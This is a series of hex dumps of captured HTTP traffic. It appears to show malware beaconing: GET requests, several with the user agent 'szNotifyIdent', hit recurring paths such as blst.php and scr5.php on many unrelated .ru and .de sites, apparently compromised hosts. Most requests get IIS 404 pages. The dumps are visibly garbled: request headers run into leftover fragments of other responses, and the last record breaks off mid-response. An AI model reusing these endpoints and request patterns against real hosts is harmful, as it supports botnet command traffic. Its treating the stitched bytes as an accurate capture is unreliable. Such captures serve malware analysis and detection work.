0x00000030 (00048)   63636570 743a202a 2f2a0d0a 41636365   ccept: */*..Acce
0x00000040 (00064)   70742d45 6e636f64 696e673a 20677a69   pt-Encoding: gzi
0x00000050 (00080)   702c2064 65666c61 74650d0a 55736572   p, deflate..User
0x00000060 (00096)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000070 (00112)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000080 (00128)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x00000090 (00144)   7773204e 5420352e 313b2053 56313b20   ws NT 5.1; SV1; 
0x000000a0 (00160)   2e4e4554 20434c52 20322e30 2e353037   .NET CLR 2.0.507
0x000000b0 (00176)   3237290d 0a486f73 743a2064 69652d63   27)..Host: die-c
0x000000c0 (00192)   6c697175 65652e64 650d0a43 6f6e6e65   liquee.de..Conne
0x000000d0 (00208)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000e0 (00224)   650d0a0d 0a696f6e 3a204b65 65702d41   e....ion: Keep-A
0x000000f0 (00240)   6c697665 0d0a0d0a 74206120 72657175   live....t a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f6d616e 61676572 5f6f6c64   GET /manager_old
0x00000010 (00016)   2f696d61 6765732f 626c7374 2e706870   /images/blst.php
0x00000020 (00032)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000030 (00048)   743a202a 2f2a0d0a 41636365 70742d45   t: */*..Accept-E
0x00000040 (00064)   6e636f64 696e673a 20677a69 702c2064   ncoding: gzip, d
0x00000050 (00080)   65666c61 74650d0a 55736572 2d416765   eflate..User-Age
0x00000060 (00096)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000070 (00112)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x00000080 (00128)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x00000090 (00144)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x000000a0 (00160)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x000000b0 (00176)   0a486f73 743a2077 77772e6c 6f77656e   .Host: www.lowen
0x000000c0 (00192)   62726175 2e72750d 0a436f6e 6e656374   brau.ru..Connect
0x000000d0 (00208)   696f6e3a 204b6565 702d416c 6976650d   ion: Keep-Alive.
0x000000e0 (00224)   0a0d0a20 203c703e 596f7572 2062726f   ...  <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f6b7265 74612f62 6c73742e   GET /kreta/blst.
0x00000010 (00016)   70687020 48545450 2f312e31 0d0a4163   php HTTP/1.1..Ac
0x00000020 (00032)   63657074 3a202a2f 2a0d0a41 63636570   cept: */*..Accep
0x00000030 (00048)   742d456e 636f6469 6e673a20 677a6970   t-Encoding: gzip
0x00000040 (00064)   2c206465 666c6174 650d0a55 7365722d   , deflate..User-
0x00000050 (00080)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000060 (00096)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000070 (00112)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000080 (00128)   73204e54 20352e31 3b205356 313b202e   s NT 5.1; SV1; .
0x00000090 (00144)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x000000a0 (00160)   37290d0a 486f7374 3a20636f 6d646174   7)..Host: comdat
0x000000b0 (00176)   2e64650d 0a436f6e 6e656374 696f6e3a   .de..Connection:
0x000000c0 (00192)   204b6565 702d416c 6976650d 0a0d0a74    Keep-Alive....t
0x000000d0 (00208)   696f6e3a 204b6565 702d416c 6976650d   ion: Keep-Alive.
0x000000e0 (00224)   0a0d0a20 203c703e 596f7572 2062726f   ...  <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f696d67 2f736372 352e7068   GET /img/scr5.ph
0x00000010 (00016)   703f703d 33373432 35266964 3d393834   p?p=37425&id=984
0x00000020 (00032)   38393336 31392048 5454502f 312e310d   893619 HTTP/1.1.
0x00000030 (00048)   0a557365 722d4167 656e743a 20737a4e   .User-Agent: szN
0x00000040 (00064)   6f746966 79496465 6e740d0a 486f7374   otifyIdent..Host
0x00000050 (00080)   3a20706c 61737469 6b702e72 750d0a0d   : plastikp.ru...
0x00000060 (00096)   0a302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000070 (00112)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000080 (00128)   73204e54 20352e31 3b205356 313b202e   s NT 5.1; SV1; .
0x00000090 (00144)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x000000a0 (00160)   37290d0a 486f7374 3a20636f 6d646174   7)..Host: comdat
0x000000b0 (00176)   2e64650d 0a436f6e 6e656374 696f6e3a   .de..Connection:
0x000000c0 (00192)   204b6565 702d416c 6976650d 0a0d0a74    Keep-Alive....t
0x000000d0 (00208)   696f6e3a 204b6565 702d416c 6976650d   ion: Keep-Alive.
0x000000e0 (00224)   0a0d0a20 203c703e 596f7572 2062726f   ...  <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f727573 2f696d61 6765732f   GET /rus/images/
0x00000010 (00016)   62616e6e 6572732f 626c7374 2e706870   banners/blst.php
0x00000020 (00032)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000030 (00048)   743a202a 2f2a0d0a 41636365 70742d45   t: */*..Accept-E
0x00000040 (00064)   6e636f64 696e673a 20677a69 702c2064   ncoding: gzip, d
0x00000050 (00080)   65666c61 74650d0a 55736572 2d416765   eflate..User-Age
0x00000060 (00096)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000070 (00112)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x00000080 (00128)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x00000090 (00144)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x000000a0 (00160)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x000000b0 (00176)   0a486f73 743a2077 77772e70 736e722e   .Host: www.psnr.
0x000000c0 (00192)   72750d0a 436f6e6e 65637469 6f6e3a20   ru..Connection: 
0x000000d0 (00208)   4b656570 2d416c69 76650d0a 0d0a650d   Keep-Alive....e.
0x000000e0 (00224)   0a0d0a20 203c703e 596f7572 2062726f   ...  <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f696d67 2f706963 742f626c   GET /img/pict/bl
0x00000010 (00016)   73742e70 68702048 5454502f 312e310d   st.php HTTP/1.1.
0x00000020 (00032)   0a416363 6570743a 202a2f2a 0d0a4163   .Accept: */*..Ac
0x00000030 (00048)   63657074 2d456e63 6f64696e 673a2067   cept-Encoding: g
0x00000040 (00064)   7a69702c 20646566 6c617465 0d0a5573   zip, deflate..Us
0x00000050 (00080)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000060 (00096)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x00000070 (00112)   653b204d 53494520 362e303b 2057696e   e; MSIE 6.0; Win
0x00000080 (00128)   646f7773 204e5420 352e313b 20535631   dows NT 5.1; SV1
0x00000090 (00144)   3b202e4e 45542043 4c522032 2e302e35   ; .NET CLR 2.0.5
0x000000a0 (00160)   30373237 290d0a48 6f73743a 2067617a   0727)..Host: gaz
0x000000b0 (00176)   2d736572 76696365 2e72750d 0a436f6e   -service.ru..Con
0x000000c0 (00192)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x000000d0 (00208)   6976650d 0a0d0a69 76650d0a 0d0a650d   ive....ive....e.
0x000000e0 (00224)   0a0d0a20 203c703e 596f7572 2062726f   ...  <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f68746d 6c617265 612f696d   GET /htmlarea/im
0x00000010 (00016)   61676573 2f736372 352e7068 703f703d   ages/scr5.php?p=
0x00000020 (00032)   33373432 35266964 3d393834 38393336   37425&id=9848936
0x00000030 (00048)   31392048 5454502f 312e310d 0a557365   19 HTTP/1.1..Use
0x00000040 (00064)   722d4167 656e743a 20737a4e 6f746966   r-Agent: szNotif
0x00000050 (00080)   79496465 6e740d0a 486f7374 3a207777   yIdent..Host: ww
0x00000060 (00096)   772e6c65 76616461 2e72750d 0a0d0a     w.levada.ru....

0x00000000 (00000)   47455420 2f696d67 2f706963 742f626c   GET /img/pict/bl
0x00000010 (00016)   73742e70 68702048 5454502f 312e310d   st.php HTTP/1.1.
0x00000020 (00032)   0a416363 6570743a 202a2f2a 0d0a4163   .Accept: */*..Ac
0x00000030 (00048)   63657074 2d456e63 6f64696e 673a2067   cept-Encoding: g
0x00000040 (00064)   7a69702c 20646566 6c617465 0d0a5573   zip, deflate..Us
0x00000050 (00080)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000060 (00096)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x00000070 (00112)   653b204d 53494520 362e303b 2057696e   e; MSIE 6.0; Win
0x00000080 (00128)   646f7773 204e5420 352e313b 20535631   dows NT 5.1; SV1
0x00000090 (00144)   3b202e4e 45542043 4c522032 2e302e35   ; .NET CLR 2.0.5
0x000000a0 (00160)   30373237 290d0a48 6f73743a 20726477   0727)..Host: rdw
0x000000b0 (00176)   7566612e 72750d0a 436f6e6e 65637469   ufa.ru..Connecti
0x000000c0 (00192)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000d0 (00208)   0d0a4e6f 7420466f 756e643c 2f68313e   ..Not Found</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f70726f 672f696d 672f7072   GET /prog/img/pr
0x00000010 (00016)   6f697a76 6f642f62 6c73742e 70687020   oizvod/blst.php 
0x00000020 (00032)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000030 (00048)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000040 (00064)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000050 (00080)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000060 (00096)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000070 (00112)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000080 (00128)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000090 (00144)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x000000a0 (00160)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000b0 (00176)   486f7374 3a206176 69737472 6164652e   Host: avistrade.
0x000000c0 (00192)   72750d0a 436f6e6e 65637469 6f6e3a20   ru..Connection: 
0x000000d0 (00208)   4b656570 2d416c69 76650d0a 0d0a313e   Keep-Alive....1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f446573 69676e2f 626c7374   GET /Design/blst
0x00000010 (00016)   2e706870 20485454 502f312e 310d0a41   .php HTTP/1.1..A
0x00000020 (00032)   63636570 743a202a 2f2a0d0a 41636365   ccept: */*..Acce
0x00000030 (00048)   70742d45 6e636f64 696e673a 20677a69   pt-Encoding: gzi
0x00000040 (00064)   702c2064 65666c61 74650d0a 55736572   p, deflate..User
0x00000050 (00080)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000060 (00096)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000070 (00112)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x00000080 (00128)   7773204e 5420352e 313b2053 56313b20   ws NT 5.1; SV1; 
0x00000090 (00144)   2e4e4554 20434c52 20322e30 2e353037   .NET CLR 2.0.507
0x000000a0 (00160)   3237290d 0a486f73 743a2077 77772e74   27)..Host: www.t
0x000000b0 (00176)   686f6d61 732d7765 2e64650d 0a436f6e   homas-we.de..Con
0x000000c0 (00192)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x000000d0 (00208)   6976650d 0a0d0a69 76650d0a 0d0a313e   ive....ive....1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f76616b 616e732f 626c7374   GET /vakans/blst
0x00000010 (00016)   2e706870 20485454 502f312e 310d0a41   .php HTTP/1.1..A
0x00000020 (00032)   63636570 743a202a 2f2a0d0a 41636365   ccept: */*..Acce
0x00000030 (00048)   70742d45 6e636f64 696e673a 20677a69   pt-Encoding: gzi
0x00000040 (00064)   702c2064 65666c61 74650d0a 55736572   p, deflate..User
0x00000050 (00080)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000060 (00096)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000070 (00112)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x00000080 (00128)   7773204e 5420352e 313b2053 56313b20   ws NT 5.1; SV1; 
0x00000090 (00144)   2e4e4554 20434c52 20322e30 2e353037   .NET CLR 2.0.507
0x000000a0 (00160)   3237290d 0a486f73 743a206d 6f6e6f6d   27)..Host: monom
0x000000b0 (00176)   61682d63 6974792e 72750d0a 436f6e6e   ah-city.ru..Conn
0x000000c0 (00192)   65637469 6f6e3a20 4b656570 2d416c69   ection: Keep-Ali
0x000000d0 (00208)   76650d0a 0d0a0a69 76650d0a 0d0a313e   ve.....ive....1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f702f6c 616e672f 4356532f   GET /p/lang/CVS/
0x00000010 (00016)   626c7374 2e706870 20485454 502f312e   blst.php HTTP/1.
0x00000020 (00032)   310d0a41 63636570 743a202a 2f2a0d0a   1..Accept: */*..
0x00000030 (00048)   41636365 70742d45 6e636f64 696e673a   Accept-Encoding:
0x00000040 (00064)   20677a69 702c2064 65666c61 74650d0a    gzip, deflate..
0x00000050 (00080)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000060 (00096)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x00000070 (00112)   626c653b 204d5349 4520362e 303b2057   ble; MSIE 6.0; W
0x00000080 (00128)   696e646f 7773204e 5420352e 313b2053   indows NT 5.1; S
0x00000090 (00144)   56313b20 2e4e4554 20434c52 20322e30   V1; .NET CLR 2.0
0x000000a0 (00160)   2e353037 3237290d 0a486f73 743a206d   .50727)..Host: m
0x000000b0 (00176)   69722d76 65736f76 2e72750d 0a436f6e   ir-vesov.ru..Con
0x000000c0 (00192)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x000000d0 (00208)   6976650d 0a0d0a69 76650d0a 0d0a313e   ive....ive....1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f736f76 72656d2f 70616e6f   GET /sovrem/pano
0x00000010 (00016)   72616d61 2f626c73 742e7068 70204854   rama/blst.php HT
0x00000020 (00032)   54502f31 2e310d0a 41636365 70743a20   TP/1.1..Accept: 
0x00000030 (00048)   2a2f2a0d 0a416363 6570742d 456e636f   */*..Accept-Enco
0x00000040 (00064)   64696e67 3a20677a 69702c20 6465666c   ding: gzip, defl
0x00000050 (00080)   6174650d 0a557365 722d4167 656e743a   ate..User-Agent:
0x00000060 (00096)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000070 (00112)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000080 (00128)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000090 (00144)   2e313b20 5356313b 202e4e45 5420434c   .1; SV1; .NET CL
0x000000a0 (00160)   5220322e 302e3530 37323729 0d0a486f   R 2.0.50727)..Ho
0x000000b0 (00176)   73743a20 70726f6d 636f2e72 750d0a43   st: promco.ru..C
0x000000c0 (00192)   6f6e6e65 6374696f 6e3a204b 6565702d   onnection: Keep-
0x000000d0 (00208)   416c6976 650d0a0d 0a650d0a 0d0a313e   Alive....e....1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f5f7468 656d6573 2f6b6f70   GET /_themes/kop
0x00000010 (00016)   69652d76 6f6e2d66 616e7461 7369652d   ie-von-fantasie-
0x00000020 (00032)   696e2d62 6c61752f 626c7374 2e706870   in-blau/blst.php
0x00000030 (00048)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000040 (00064)   743a202a 2f2a0d0a 41636365 70742d45   t: */*..Accept-E
0x00000050 (00080)   6e636f64 696e673a 20677a69 702c2064   ncoding: gzip, d
0x00000060 (00096)   65666c61 74650d0a 55736572 2d416765   eflate..User-Age
0x00000070 (00112)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000080 (00128)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x00000090 (00144)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x000000a0 (00160)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x000000b0 (00176)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x000000c0 (00192)   0a486f73 743a2077 77772e31 33747732   .Host: www.13tw2
0x000000d0 (00208)   32726967 6f626572 742e6465 0d0a436f   2rigobert.de..Co
0x000000e0 (00224)   6e6e6563 74696f6e 3a204b65 65702d41   nnection: Keep-A
0x000000f0 (00240)   6c697665 0d0a0d0a 74206120 72657175   live....t a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f646573 69676e2f 696d6167   GET /design/imag
0x00000010 (00016)   65732f69 636f6e73 2f736372 352e7068   es/icons/scr5.ph
0x00000020 (00032)   703f703d 33373432 35266964 3d393834   p?p=37425&id=984
0x00000030 (00048)   38393336 31392048 5454502f 312e310d   893619 HTTP/1.1.
0x00000040 (00064)   0a557365 722d4167 656e743a 20737a4e   .User-Agent: szN
0x00000050 (00080)   6f746966 79496465 6e740d0a 486f7374   otifyIdent..Host
0x00000060 (00096)   3a206d75 6c74692d 67616d69 6e672e63   : multi-gaming.c
0x00000070 (00112)   6f6d0d0a 0d0a3130 3a34313a 33382047   om....10:41:38 G
0x00000080 (00128)   4d540d0a 0d0a3c68 746d6c3e 0a20203c   MT....<html>.  <
0x00000090 (00144)   68656164 3e0a2020 20203c74 69746c65   head>.    <title
0x000000a0 (00160)   3e343034 204e6f74 20466f75 6e643c2f   >404 Not Found</
0x000000b0 (00176)   7469746c 653e0a20 203c2f68 6561643e   title>.  </head>
